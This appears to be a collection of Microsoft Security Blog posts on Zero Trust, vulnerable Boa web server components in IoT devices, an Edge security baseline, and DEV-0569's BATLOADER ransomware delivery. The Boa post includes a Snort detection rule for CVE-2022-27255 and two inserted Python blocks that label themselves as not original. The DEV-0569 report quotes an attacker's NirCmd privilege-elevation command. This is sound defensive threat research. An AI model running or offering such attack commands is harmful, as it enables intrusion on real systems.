This blog post is part of the Microsoft Intelligent Security Association guest blog series. Learn more about MISA.

As more employees work remotely on a variety of devices and networks, businesses need a security model that supports this new operational efficiency. An expanding perimeter poses challenges for organizational security, exposing your company to risks from malware and data breaches from IT devices that are unknown and unsafe.

To adapt to the realities of modern work, the principles of Zero Trust have been rapidly adopted as a security best practice by businesses and security professionals alike.

A pillar of the Zero Trust framework is based on assuming devices are breached until they are explicitly verified as trusted.

This applies particularly to mobile devices, as employee-held smartphones are increasingly infected with malware, targeted by phishing attacks, or exploited due to vulnerable software and configuration. These threats on untrusted devices that access company data result in businesses suffering from cyberattacks and data breaches. By embracing the principles of Zero Trust, businesses can better manage these risks and secure themselves against mobile-borne threats by ensuring that only trusted devices have access to company data.

How Microsoft and Traced work together to ensure endpoint protection based on Zero Trust principles

United Kingdom-based cybersecurity vendor Traced Mobile Security joined the Microsoft Intelligence Security Association (MISA) with the goal of transforming Zero Trust access to business data on mobile devices.

“At Traced, our vision is to live in a world where anyone can comfortably, easily, and securely use the same mobile device for work and play. MISA has helped us to do so with their valuable advice, access to technical experts, and sharing our vision for safer devices.”

Benedict Jones, Co-Founder, Traced

Trust nothing, verify everything.

With ever-more mobile devices accessing company networks, information, and cloud apps, customers need to be able to automatically control access to cloud apps based on the security status of a smartphone or tablet—whether it’s personal- or corporate-owned.

So Traced developed Trustd MTD to provide simple, fast, and robust Zero Trust access to those Cloud Apps for Microsoft customers. Trustd’s integration with Microsoft Azure Active Directory (Azure AD), part of the Microsoft Entra product family, helps customers achieve compliance and mitigate the growing business risks of cyberattacks and data breaches originating from company and personal mobile devices.

This means that customers can:

  • Reduce the risk of data breaches, fines, and damages from cyberthreats such as Man-in-the-Middle attacks, malware, and phishing.
  • Enable secure remote working without compromising efficiency.
  • Automatically allow access to company data when a user’s device is validated as trusted and restrict access if it becomes untrusted.
  • Protect their private data on mobile devices across most locations and networks.

“As mobile threats abound in greater numbers, we’re seeing many businesses struggling to protect themselves. We’re using Trustd MTD to enforce the principles of Zero Trust for our customers and ensure that untrusted and compromised mobile devices cannot access company data.”

Fayyaz Shah, Chief Operating Officer, METCLOUD

Through Trustd MTD’s integration with Azure AD conditional access policies, customers can automatically restrict access to thousands of Azure AD Gallery apps from users with compromised or untrusted mobile devices.

Architectural diagram describing Trustd MTD’s integration with Microsoft Azure Active Directory.

With Azure AD Single Sign-on (SSO) being seamlessly supported across such a broad range of apps, Trustd MTD’s integration with Azure AD for conditional access to company resources means that we can together ensure that company data is inaccessible to compromised users for your business’ key and sensitive apps.

Benedict Jones, Co-Founder, Traced

Free Zero Trust white paper

To learn more about Zero Trust and how Azure AD integrates with Traced’s MTD solution, download the free Trustd whitepaper “Zero Trust mobile security in a perimeter-less world.”

Snippet of Zero Trust white paper.

About Traced

Traced’s vision is to make the invisible visible.

It’s about making software that shines a light on threats that are invisible to traditional forms of detection. It’s about making sure their software protects people by being easy to understand, effective, and affordable. And it’s about respecting users’ and employees’ privacy by being transparent about what you’re doing and why.

And it’s about making a different kind of security company. A company that understands and talks about the threats that businesses really face every day, rather than the ones that get the best headlines or induce the greatest fear. For more information, visit the Traced website.

Learn more

To learn more about the Microsoft Intelligent Security Association (MISA), visit the website where you can learn about the MISA program, product integrations, and find MISA members. Visit the video playlist to learn about the strength of member integrations with Microsoft products.  

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Implementing Zero Trust access to business data on BYOD with Trustd MTD and Microsoft Entra appeared first on Microsoft Security Blog.

A Ride on the Wild Side with Hacking Heavyweight Sick Codes

November 29th, 2022 No comments

  • Beverage of Choice: Krating Daeng (Thai Red Bull)
  • Industry Influencer he Admires: Casey John Ellis
  • What did you want to be when you grew up? A physician, and nearly did
  • Hobbies (Present & Past): Motorcycling & Australian Football
  • Bucket List: Continuing to discover new software
  • Fun Fact: He currently has 2,000 tabs open

“People keep …



Microsoft supports the DoD’s Zero Trust strategy

November 22nd, 2022 No comments

The Department of Defense (DoD) released its formal Zero Trust strategy today, marking a major milestone in its goal of achieving enterprise-wide implementation by 2027. The strategy comes at a critical time as United States government networks continue to face nearly half the global nation-state attacks that occur, according to the Microsoft Digital Defense Report 2022.[1]

Microsoft applauds the DoD’s ongoing efforts to modernize and innovate its approach to cybersecurity. The DoD released its initial Zero Trust reference architecture shortly before last year’s White House executive order on cybersecurity[2] and quickly followed with Version 2.0 in July 2022.[3] The latest update provides crucial details for implementing the Zero Trust strategy, including clear guidance for the DoD and its vendors regarding 45 separate capabilities and 152 total activities.

While Zero Trust initiatives have been underway for years across various departments, this updated strategy seeks to unify efforts to achieve a strong, proven defensive posture against adversary tactics. Collaborating on Zero Trust has been a challenge across the industry as it can be difficult to compare Zero Trust implementations across organizations and technology stacks. However, the level of detail found in the DoD’s strategy provides a vendor-agnostic, common lens to evaluate the maturity of a variety of existing and planned implementations that were derived from the DoD’s unique insights into cyberspace operations.

Furthermore, the DoD’s shift from a compliance and controls-based approach to an outcomes-focused methodology—meaning the job is done when the adversary stops, not just when the controls are in place—stands out as a best practice not seen elsewhere to this extent.

Building a secure foundation for Zero Trust together

Strong industry and public sector partnerships are at the heart of our approach, which is why Microsoft was invited by the DoD to discuss how its Zero Trust definitions would map to new and existing computing environments.

Microsoft is uniquely suited to support the DoD in its Zero Trust mission as both a leading cloud service provider to the government and a security company. Microsoft is recognized as a Leader in five Gartner® Magic Quadrant™ reports[4-9] and seven Forrester Wave™ categories[10-16], representing a full array of fit-for-purpose security tools to achieve Zero Trust outcomes. These components are pre-integrated to provide a strong baseline and a fast path to comprehensive coverage across the DoD’s seven pillars and 45 capabilities of Zero Trust to achieve both target and advanced activities.

Beyond comprehensive coverage of the DoD’s latest capabilities requirements, our strong baseline is further enhanced by an open ecosystem of more than 90 partner Zero Trust solutions from leading security companies that integrate directly with our platform. To name a few:

  • Tenable and Microsoft are working together to integrate with Microsoft Defender for Cloud and Microsoft Sentinel solutions to support vulnerability assessments for hybrid cloud workloads.
  • Yubico and Microsoft recently announced the release of certificate-based authentication (CBA) for Microsoft Azure Active Directory on Windows, iOS, and Android devices through a hardware security key known as YubiKey to fight against phishing attacks.
  • Conquest Cyber launched the ARMED™ Platform built on Microsoft Sentinel to help agencies configure and manage solutions to address cyber risk with real-time visibility of their posture, guided by compliance, maturity, and effectiveness.

Lastly, Microsoft is deeply committed to promoting cyber resilience and strengthening our nation’s cyber defenses. This responsibility is demonstrated by our work with the National Institute of Standards and Technology’s (NIST’s) National Cybersecurity Center of Excellence (NCCoE) to develop practical, interoperable Zero Trust approaches and architectures, as well as our continued participation in the Joint Cyber Defense Collaborative established by Cybersecurity & Infrastructure Security Agency (CISA).

Real-world pilots and implementations are driving continuous learning and improvement

Zero Trust philosophy is deeply rooted in lessons learned, and the DoD has embraced this aspect by evaluating ongoing pilots and assessments as a research and development activity. Over the past years, Microsoft has partnered with various departments across the DoD to accelerate Zero Trust adoption through several pilot and production implementations, providing agencies with a predictable path to achieving target objectives.

One such example is the United States Navy’s innovative Flank Speed program, which incorporates key federal and DoD efforts to protect nearly 500,000 identities and devices while improving user experience. The Navy’s large-scale deployment—encompassing components including continuous authorization, big data, and comply-to-connect (C2C)—is already utilizing many of the Zero Trust activities put forth in the DoD’s strategy.

Learn more

Embrace proactive security with Zero Trust.

For more deployment information, tools, and resources as we work together to improve our nation’s cybersecurity, visit the Microsoft cybersecurity for government page.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

[1] Microsoft Digital Defense Report 2022, Microsoft, 2022.

[2] The Cybersecurity Executive Order: What’s Next for Federal Agencies, Jason Payne, Microsoft, June 17, 2021.

[3] Department of Defense (DoD) Zero Trust Reference Architecture Version 2.0, Defense Information Systems Agency (DISA), National Security Agency (NSA) Zero Trust Engineering Team, July 2022.

[4] Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, express or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose. GARTNER and Magic Quadrant are registered trademarks and service marks of Gartner, Inc. and/or its affiliates in the U.S. and internationally and are used herein with permission. All rights reserved.

[5] Gartner Magic Quadrant for Security Information and Event Management, Pete Shoard, Andrew Davies, Mitchell Schneider, 10 October 2022.

[6] Gartner Magic Quadrant for Access Management, Henrique Teixeira, Abhyuday Data, Michael Kelly, James Hoover, Brian Guthrie, 1 November 2022.

[7] Gartner Magic Quadrant for Enterprise Information Archiving, Michael Hoeff, Jeff Vogel, 24 January 2022.

[8] Gartner Magic Quadrant for Endpoint Protection Platforms, Peter Firstbrook, Dionisio Zumerle, Prateek Bhajanka, Lawrence Pingree, Paul Webber, 5 May 2021.

[9] Gartner Magic Quadrant for Unified Endpoint Management Tools, Tom Cipolla, Dan Wilson, Chris Silva, Craig Fisler, 1 August 2022.

[10] The Forrester Wave™: Endpoint Detection And Response Providers, Q2 2022, Allie Mellen, April 2022.

[11] The Forrester New Wave™: Extended Detection And Response (XDR), Q4 2021, Allie Mellen, October 2021.

[12] The Forrester Wave™: Security Analytics Platforms, Q4 2020, Joseph Blankenship, Claire O’Malley, December 2020.

[13] The Forrester Wave™: Enterprise Email Security, Q2 2021, Joseph Blankenship, Claire O’Malley with Stephanie Balaouras, Allie Mellen, Shannon Fish, Peggy Dostie, May 2021.

[14] The Forrester Wave™: Endpoint Security Software As A Service, Q2 2021, Chris Sherman with Merritt Maxim, Allie Mellen, Shannon Fish, Peggy Dostie, May 2021.

[15] The Forrester Wave™: Unstructured Data Security Platforms, Q2 2021, Heidi Shey, May 2021.

[16] The Forrester Wave™: Cloud Security Gateways, Q2 2021, Andras Cser, May 2021.

The post Microsoft supports the DoD’s Zero Trust strategy appeared first on Microsoft Security Blog.


Join us at InfoSec Jupyterthon 2022

Notebooks are gaining popularity in InfoSec. Used interactively for investigations and hunting or as scheduled processing jobs, notebooks offer plenty of advantages over traditional security operations center (SOC) tools. Sitting somewhere between scripting/macros and a full-blown development environment, they offer easy entry to data analyses and visualizations that are key to modern SOC engagements.

Join our community of analysts and engineers at the third annual InfoSec Jupyterthon 2022, where you’ll meet and engage with security practitioners using notebooks in their daily work. This is an online event taking place on December 2 and 3, 2022. It is organized by our friends at Open Threat Research, together with folks from Microsoft Security research teams and the Microsoft Threat Intelligence Center (MSTIC).

Although this is not a Microsoft event, our Microsoft Security teams are delighted to be involved in helping organize it and deliver talks. Registration is free and it will be streamed on YouTube Live both days from 10:30 AM to 5:00 PM Eastern Time. We’ll also have a dedicated Discord channel for discussions and session Q&A.

Do you have a cool notebook or some interesting techniques or technology to talk about? There are still openings for talks and mini talks (30-minute, 15-minute, and 5-minute sessions).  Submit your proposal here.

For more information, visit the InfoSec Jupyterthon page at:

We’re looking forward to seeing you there!

The post Join us at InfoSec Jupyterthon 2022 appeared first on Microsoft Security Blog.

Vulnerable SDK components lead to supply chain risks in IoT and OT environments

November 22nd, 2022 No comments

Vulnerabilities in network components, architecture files, and developer tools have become increasingly popular attack vectors to gain access into secure networks and devices. External tools and products that are managed by vendors and developers can pose a security risk, especially to targets in sensitive industries. Attacks on software and hardware supply chains, like Log4J and SolarWinds, have highlighted the importance of visibility across device components and proactively securing networks. A report published by Recorded Future in April 2022 detailed suspected electrical grid intrusion activity and implicated common IoT devices as the vector used to gain a foothold into operational technology (OT) networks and deploy malicious payloads. While investigating the attack activity, Microsoft researchers identified a vulnerable component on all the IP addresses published as IOCs and found evidence of a supply chain risk that may affect millions of organizations and devices.

We assessed the vulnerable component to be the Boa web server, which is often used to access settings and management consoles and sign-in screens in devices. Despite being discontinued in 2005, the Boa web server continues to be implemented by different vendors across a variety of IoT devices and popular software development kits (SDKs). Without developers managing the Boa web server, its known vulnerabilities could allow attackers to silently gain access to networks by collecting information from files. Moreover, those affected may be unaware that their devices run services using the discontinued Boa web server, and that firmware updates and downstream patches do not address its known vulnerabilities.

In this blog, we detail the risks affiliated with vulnerable components, highlighting the Boa web server, and how we suspect these components could be exploited to target critical industries. We also discuss the difficulties with identifying these components in device supply chains. To provide comprehensive protection against such attacks, we offer detection information to identify vulnerable components and guidance for organizations and network operators to improve their security posture.

Investigating the attack activity

The attack detailed in the Recorded Future report was one of several intrusion attempts on Indian critical infrastructure since 2020, with the most recent attack on IT assets confirmed in October 2022. Microsoft assesses that Boa servers were running on the IP addresses on the list of IOCs published by Recorded Future at the time of the report’s release and that the electrical grid attack targeted exposed IoT devices running Boa.

Microsoft further identified that half of the IP addresses published by Recorded Future returned suspicious HTTP response headers, which might be associated with the active deployment of the malicious tool identified by Recorded Future. The combination of Boa and suspicious response headers was identified on another set of IP addresses, displaying similar behavior to those found by Recorded Future. While these IP addresses are not confirmed as malicious, we recommend they be monitored to ensure no additional suspicious activity. Users of Microsoft Defender Threat Intelligence will find these IP addresses in the portal labeled as block-listed or suspicious.

Investigating the headers further indicated that over 10% of all active IP addresses returning the headers were related to critical industries, such as the petroleum industry and associated fleet services. Many of those IP addresses were associated with IoT devices, such as routers, with unpatched critical vulnerabilities, highlighting an accessible attack vector for malware operators. Most of the suspicious HTTP response headers were returned over a short timeframe of several days, leading researchers to believe they may be associated with intrusion and malicious activity on networks.

Since the report’s publication, Microsoft researchers tracking the hosts at the published IP addresses have observed that all of them have been compromised by a variety of attackers employing different malicious methods. For example, some of the IP addresses were further leveraged to download a variant of the Mirai malware family shortly following the report’s release. Microsoft also found evidence that, across different devices on the IP addresses, there were attempts to connect with default credentials through brute force methods and attempts to run shell commands. Microsoft continues to see attackers attempting to exploit Boa vulnerabilities beyond the timeframe of the released report, indicating that it is still targeted as an attack vector.

Boa widespread through SDKs

The Boa web server is widely implemented across a variety of devices, including IoT devices ranging from routers to cameras, and is often used to access settings and management consoles as well as sign-in screens. The popularity of Boa web servers is especially concerning as Boa has been formally discontinued since 2005. Data from the Microsoft Defender Threat Intelligence platform identified over 1 million internet-exposed Boa server components around the world over the span of a week, as depicted in the below figure:

Global distribution map displaying exposed Boa web servers over the span of a week.
Figure 1. Global mapping of internet-exposed Boa web servers on devices

Boa web servers remain pervasive in the development of IoT devices; one reason for this could be their inclusion in popular SDKs, which contain the essential functions that operate the system on chip (SOC) implemented in microchips. Vulnerable components like Boa and SDKs are often distributed to customers within devices, contributing to supply chain vulnerabilities. Popular SDKs, like those released by RealTek, are used in SOCs provided to companies that manufacture gateway devices like routers, access points, and repeaters. Critical vulnerabilities such as CVE-2021-35395, which affected the digital administration of devices using RealTek’s SDK, and CVE-2022-27255, a zero-click overflow vulnerability, reportedly affect millions of devices globally and allow attackers to launch code, compromise devices, deploy botnets, and move laterally on networks.

While patches for the RealTek SDK vulnerabilities are available, some vendors may not have included them in their device firmware updates, and the updates do not include patches for Boa vulnerabilities. Boa servers are affected by several known vulnerabilities, including arbitrary file access (CVE-2017-9833) and information disclosure (CVE-2021-33558). These vulnerabilities may allow attackers to execute code remotely after gaining device access by reading the “passwd” file from the device or accessing sensitive URIs in the web server to extract a user’s credentials. Moreover, these vulnerabilities require no authentication to exploit, making them attractive targets.
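Identifying the discontinued Boa component in one's own inventory starts with the HTTP responses devices return. The following is an added example (not code from the original post) that parses a captured HTTP response head, reports whether the Server header names Boa, and attaches the two Boa CVEs mentioned above for review; the sample responses are constructed, and the Boa version string in them is illustrative.

```python
"""
Triage captured HTTP responses for the discontinued Boa web server.
Added example, not from the original post. The sample responses are constructed.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple

# Boa issues named in the post; a finding carries them so the operator knows what to check.
BOA_KNOWN_CVES = ("CVE-2017-9833", "CVE-2021-33558")


@dataclass
class ServerFinding:
    status_code: Optional[int]
    server_header: Optional[str]
    is_boa: bool
    boa_version: Optional[str]
    cves_to_review: tuple = field(default_factory=tuple)


def parse_head(raw: bytes) -> Tuple[Optional[int], Dict[str, str]]:
    """Split an HTTP response into its status code and a lower-cased header map.
    Only the head (up to the first blank line) is parsed; the body is ignored."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1", errors="replace")
    lines = head.split("\r\n")
    m = re.match(r"HTTP/\d\.\d\s+(\d{3})", lines[0])
    status = int(m.group(1)) if m else None
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return status, headers


def triage_response(raw: bytes) -> ServerFinding:
    """Flag a response whose Server header identifies Boa (any version)."""
    status, headers = parse_head(raw)
    server = headers.get("server")
    is_boa, version = False, None
    if server is not None:
        m = re.match(r"\s*Boa(?:/([\w.\-]+))?", server, re.IGNORECASE)
        if m:
            is_boa, version = True, m.group(1)
    return ServerFinding(status, server, is_boa, version,
                         BOA_KNOWN_CVES if is_boa else ())


# Constructed sample responses (not real captures).
SAMPLE_BOA = (b"HTTP/1.1 401 Unauthorized\r\n"
              b"Server: Boa/0.94.14rc21\r\n"
              b"WWW-Authenticate: Basic realm=\"router\"\r\n"
              b"Content-Type: text/html\r\n\r\n<html>login</html>")
SAMPLE_OTHER = b"HTTP/1.1 200 OK\r\nServer: nginx/1.22.1\r\nContent-Length: 0\r\n\r\n"
SAMPLE_NO_SERVER = b"HTTP/1.0 200 OK\r\nContent-Type: text/plain\r\n\r\nok"

if __name__ == "__main__":
    for raw in (SAMPLE_BOA, SAMPLE_OTHER, SAMPLE_NO_SERVER):
        print(triage_response(raw))
```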

Boa web servers vulnerable to CVEs from 2017 and 2021 are used in RealTek SDKs that are vulnerable to CVEs from 2021 and 2022. Both of these components are then implemented in RealTek SOCs, which are used in routers and similar IoT devices in corporate and manufacturing environments, leaving them vulnerable to unauthorized arbitrary file access and information disclosure.
Figure 2. The IoT device supply chain demonstrates how vulnerabilities are distributed downstream to organizations and their assets

The popularity of the Boa web server displays the potential exposure risk of an insecure supply chain, even when security best practices are applied to devices in the network. Updating the firmware of IoT devices does not always patch SDKs or specific SOC components and there is limited visibility into components and whether they can be updated. The known CVEs impacting such components can allow an attacker to collect information about network assets before initiating attacks, and to gain access to a network undetected by obtaining valid credentials. In critical infrastructure networks, being able to collect information undetected prior to the attack allows the attackers to have much greater impact once the attack is initiated, potentially disrupting operations that can cost millions of dollars and affect millions of people.


As attackers seek new footholds into increasingly secure devices and networks, identifying and preventing distributed security risks through software and hardware supply chains, like outdated components, should be prioritized by organizations. This case displays the importance of proactive cybersecurity practices and the need to identify vulnerable components that may be leveraged by attackers.

Microsoft recommends that organizations and network operators follow best practice guidelines for their networks:

  • Patch vulnerable devices whenever possible to reduce exposure risks across your organization.
  • Utilize device discovery and classification to identify devices with vulnerable components: enable vulnerability assessments, which identify unpatched devices in the organizational network, and set up workflows for initiating the appropriate patch processes with solutions like Microsoft Defender Vulnerability Management and Microsoft Defender for Endpoint with Microsoft Defender for IoT.
  • Extend vulnerability and risk detection beyond the firewall with platforms like Microsoft Defender External Attack Surface Management. Customers can identify internet-exposed infrastructure running Boa web server components in their inventory and use the insights tile under the Attack Surface Summary dashboard to surface assets vulnerable to CVE-2017-9833. The insight can be found under High Severity Observations.
  • Reduce the attack surface by eliminating unnecessary internet connections to IoT devices in the network. Apply network segmentation to prevent an attacker from moving laterally and compromising assets after intrusion. IoT and critical device networks should be isolated with firewalls.
  • Use proactive antivirus scanning to identify malicious payloads on devices.
  • Configure detection rules to identify malicious activity whenever possible. Security personnel can use our Snort rule below to configure security solutions to detect CVE-2022-27255 on assets using the RealTek SDK.
alert udp any any -> any any (msg:"Realtek eCOS SDK SIP Traffic Exploit CVE-2022-27255"; content: "invite"; depth: 6; nocase;  content: "sip:"; content: "m=audio "; isdataat: 128,relative;   content:!"|0d|"; within: 128;sid:20221031;)
  • Adopt a comprehensive IoT and OT solution like Microsoft Defender for IoT to monitor devices, respond to threats, and increase visibility in order to detect and alert when IoT devices with Boa are used as an entry point to a network and protect critical infrastructure. 
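The Snort rule in the recommendations above, re-implemented as a Python check so each of its conditions can be exercised offline against captured UDP payloads (for example when tuning the rule or explaining an alert). This is an added example, not code from the original post or from the RealTek SDK; the sample INVITE payloads are constructed, and the 192.0.2.x addresses are documentation-range placeholders.

```python
"""
Offline re-implementation of the Snort rule for CVE-2022-27255 (SIP INVITE with
an overlong m=audio line). Added example, not part of the original post.
"""
from dataclasses import dataclass
from typing import Iterable, List, Optional

MEDIA_TOKEN = b"m=audio "
WINDOW = 128  # isdataat:128,relative and within:128 in the rule


@dataclass
class RuleHit:
    index: int          # position of the packet in the input sequence
    media_offset: int   # offset of the "m=audio " token that satisfied the rule
    window: bytes       # the 128 bytes the rule inspected (no 0x0d among them)


def matches_rule(payload: bytes) -> Optional[int]:
    """Apply the rule's conditions in order; return the offset of the matching
    "m=audio " token, or None when the payload would not alert.

    content:"invite"; depth:6; nocase  -> payload begins with INVITE (any case)
    content:"sip:"                     -> a SIP URI appears somewhere
    content:"m=audio "                 -> an SDP audio media line appears
    isdataat:128,relative              -> at least 128 bytes follow that token
    content:!"|0d|"; within:128        -> none of those 128 bytes is a CR
    """
    if payload[:6].lower() != b"invite":
        return None
    if b"sip:" not in payload:
        return None
    # Snort retries later occurrences of a content match when the relative
    # conditions after it fail, so every "m=audio " token is examined.
    start = 0
    while True:
        pos = payload.find(MEDIA_TOKEN, start)
        if pos < 0:
            return None
        rel = pos + len(MEDIA_TOKEN)
        window = payload[rel:rel + WINDOW]
        if len(window) == WINDOW and b"\r" not in window:
            return pos
        start = pos + 1


def scan(payloads: Iterable[bytes]) -> List[RuleHit]:
    """Run the rule over a sequence of UDP payloads and collect the alerts."""
    hits: List[RuleHit] = []
    for i, p in enumerate(payloads):
        pos = matches_rule(p)
        if pos is not None:
            rel = pos + len(MEDIA_TOKEN)
            hits.append(RuleHit(i, pos, p[rel:rel + WINDOW]))
    return hits


def benign_invite() -> bytes:
    """Constructed, well-formed INVITE whose SDP media line is CRLF-terminated."""
    sdp = (b"v=0\r\no=- 1 1 IN IP4 192.0.2.10\r\ns=-\r\nc=IN IP4 192.0.2.10\r\n"
           b"t=0 0\r\nm=audio 49170 RTP/AVP 0\r\na=rtpmap:0 PCMU/8000\r\n")
    return (b"INVITE sip:2000@192.0.2.1 SIP/2.0\r\nVia: SIP/2.0/UDP 192.0.2.10\r\n"
            b"Content-Type: application/sdp\r\nContent-Length: %d\r\n\r\n" % len(sdp)
            + sdp)


def overlong_media_line_invite(length: int = 300) -> bytes:
    """Constructed INVITE whose m=audio line runs well past 128 bytes without a CR,
    the shape the rule flags. The filler is inert text, not an exploit payload."""
    sdp = b"v=0\r\nm=audio " + b"X" * length + b"\r\n"
    return (b"invite sip:2000@192.0.2.1 SIP/2.0\r\nContent-Type: application/sdp\r\n"
            b"Content-Length: %d\r\n\r\n" % len(sdp) + sdp)


if __name__ == "__main__":
    for hit in scan([benign_invite(), overlong_media_line_invite()]):
        print(f"packet {hit.index}: alert, m=audio at offset {hit.media_offset}")
```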

Adam Castleman, Jordan Herman, Microsoft Defender Threat Intelligence
Rotem Sde Or, Ilana Sivan, Gil Regev, Microsoft Defender for IoT Research Team
Ross Bevington, Microsoft Threat Intelligence Center

The post Vulnerable SDK components lead to supply chain risks in IoT and OT environments appeared first on Microsoft Security Blog.

Security baseline for Microsoft Edge v107

November 17th, 2022 No comments

Microsoft is pleased to announce the release of the security baseline for Microsoft Edge, version 107!


We have reviewed the settings in Microsoft Edge version 107 and updated our guidance with the addition of one new setting. We’re also highlighting three settings we would like you to consider based on your organizational needs. A new Microsoft Edge security baseline package was just released to the Download Center. You can download the new package from the Security Compliance Toolkit.


Spell checking provided by Microsoft Editor (Consider)

First introduced in Microsoft Edge version 105, Microsoft Editor uses the cloud for enhanced spell checking of text fields within the browser. This feature securely transmits form data to a Microsoft service in the cloud, as described in the Microsoft Edge Privacy Whitepaper. While the security baseline does not recommend a setting, customers should consider their own data privacy and security requirements. Further information on this setting can be found here.


Allow local MHTML files to open automatically in Internet Explorer mode (Consider)

Internet Explorer mode will remain a necessary option for the foreseeable future. However, it does come at a security cost. Any vulnerabilities in Internet Explorer will persist into the Internet Explorer mode session within Microsoft Edge. Therefore, if your organization doesn’t require the use of MHTML files, then ensure you stay the most secure by disabling this setting. The security baseline will not yet enforce this setting as we understand many organizations are still in the transformation stage for many legacy applications. Further information on this setting can be found here.


Enhanced Security Mode configuration for Intranet zone sites (Consider)

This setting complements a setting we released in Microsoft Edge version 98 (Microsoft Edge\Enhance the security state of Microsoft Edge). We still encourage you to test that setting; with the addition of this new Intranet Zone opt-out setting, enterprises now have the granular ability to opt out intranet sites, making the feature (Enhanced Security Mode) easier to adopt. Further information on this setting can be found here.


Force WebSQL to be enabled (Disable)

WebSQL is a deprecated, non-standard, legacy feature that is destined to be removed from the web platform. The security baseline has explicitly disabled this policy setting; enterprises should plan to update any legacy applications that depend upon WebSQL. Further information on this setting can be found here.


Microsoft Edge version 107 introduced 12 new computer settings and 11 new user settings. We have included a spreadsheet listing the new settings in the release to make it easier for you to find them.


As a friendly reminder, all available settings for Microsoft Edge are documented here, and all available settings for Microsoft Edge Update are documented here.


Please continue to give us feedback through the Security Baseline Community or this post.


DEV-0569 finds new ways to deliver Royal ransomware, various payloads

Recent activity from the threat actor that Microsoft tracks as DEV-0569, known to distribute various payloads, has led to the deployment of the Royal ransomware, which first emerged in September 2022 and is being distributed by multiple threat actors. Observed DEV-0569 attacks show a pattern of continuous innovation, with regular incorporation of new discovery techniques, defense evasion, and various post-compromise payloads, alongside increasing ransomware facilitation.

DEV-0569 notably relies on malvertising, phishing links that point to a malware downloader posing as software installers or updates embedded in spam emails, fake forum pages, and blog comments. In the past few months, Microsoft security researchers observed the following tweaks in the group’s delivery methods:

  • Use of contact forms on targeted organizations’ websites to deliver phishing links
  • Hosting fake installer files on legitimate-looking software download sites and legitimate repositories to make malicious downloads look authentic to targets, and
  • Expansion of their malvertising technique by using Google Ads in one of their campaigns, effectively blending in with normal ad traffic

These methods allow the group to potentially reach more targets and ultimately achieve their goal of deploying various post-compromise payloads. DEV-0569 activity uses signed binaries and delivers encrypted malware payloads. The group, also known to rely heavily on defense evasion techniques, has continued to use the open-source tool Nsudo to attempt disabling antivirus solutions in recent campaigns.

In this blog we share details of DEV-0569’s tactics, techniques, and procedures (TTPs) and observed behavior in recent campaigns, which show that DEV-0569 will likely continue leveraging malvertising and phishing for initial access. We also share preventive measures that organizations can adopt to thwart DEV-0569’s delivery methods involving malicious links and phishing emails using solutions like Microsoft Defender SmartScreen and Microsoft Defender for Office 365, and to reduce the impact of the group’s follow-on activities. Microsoft Defender for Endpoint detects the DEV-0569 behavior discussed in this blog, including the code signing certificates in use and the attempts to disable Microsoft Defender Antivirus.

Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or developing cluster of threat activity, allowing Microsoft to track it as a unique set of information until we can reach high confidence about the origin or identity of the actor behind the activity. Once it meets defined criteria, a DEV group is converted to a named actor.

DEV-0569 attack chain: Delivery tactics tweaked

DEV-0569 has multiple methods for delivery of their initial payload. In some cases, DEV-0569 payloads are delivered via phishing campaigns run by other malicious actors that offer delivery of malware payloads as a service.

Historically, a typical DEV-0569 attack begins with malicious links delivered to targets via malicious ads, fake forum pages, blog comments, or phishing emails. These links lead to malicious files signed by the attacker using a legitimate certificate. The malicious files, which are malware downloaders known as BATLOADER, pose as installers or updates for legitimate applications like Microsoft Teams or Zoom. When launched, BATLOADER uses MSI Custom Actions to launch malicious PowerShell activity or run batch scripts that aid in disabling security solutions and lead to the delivery of various encrypted malware payloads, which are decrypted and launched with PowerShell commands.

Posing as legitimate software download sites

From August to October 2022, Microsoft observed DEV-0569 activity where BATLOADER, delivered via malicious links in phishing emails, posed as legitimate installers for numerous applications like TeamViewer, Adobe Flash Player, Zoom, and AnyDesk. BATLOADER was hosted on attacker-created domains posing as legitimate software download sites (anydeskos[.]com, for example) and on legitimate repositories like GitHub and OneDrive. Microsoft takes down verified malicious content from these repositories as they are found or reported.

Screenshot of a BATLOADER landing site that poses as a TeamViewer website hosting a fake installer.

Figure 1. DEV-0569 activity seen in September 2022, where the landing site hosted BATLOADER posing as a TeamViewer installer

Use of VHD file formats

Aside from using installer files, Microsoft has also observed the use of file formats like Virtual Hard Disk (VHD) impersonating legitimate software for first-stage payloads. These VHDs also contain malicious scripts that lead to the download of DEV-0569’s malware payloads.

PowerShell and batch scripts for downloading

DEV-0569 has used varied infection chains using PowerShell and batch scripts that ultimately led to the download of malware payloads like information stealers or a legitimate remote management tool used for persistence on the network. The management tool can also be an access point for the staging and spread of ransomware.

NSudo to disable antivirus solutions

DEV-0569 also continues to tamper with antivirus products. In September and October 2022, Microsoft saw activity where DEV-0569 used the open-source NSudo tool to attempt disabling antivirus solutions.  

The diagram below illustrates a typical DEV-0569 infection chain, including some of the tweaks observed in recent campaigns.

Figure 2. High-level view of observed DEV-0569 infection chains between August and October 2022

September 2022: Adopting contact forms to gain access to targets and deliver information stealers

In September 2022, Microsoft observed a campaign using contact forms to deliver DEV-0569 payloads. Using contact forms on public websites to distribute malware has been seen in other campaigns, including IcedID malware. Attackers use this technique as a defense evasion method since contact forms can bypass email protections and appear trustworthy to the recipient.

In this campaign, DEV-0569 sent a message to targets using the contact form on these targets’ websites, posing as a national financial authority. When a contacted target responds via email, DEV-0569 replied with a message that contained a link to BATLOADER. Microsoft Defender for Office 365 detects the spoofing behavior as well as the malicious links in these emails.

The malicious links in the contact forms led to BATLOADER malware hosted on abused web services like GitHub and OneDrive. The installers launched a PowerShell script that issued multiple commands, including downloading a NirCmd command-line utility provided by freeware developer NirSoft:

nircmd elevatecmd exec hide "requestadmin.bat"

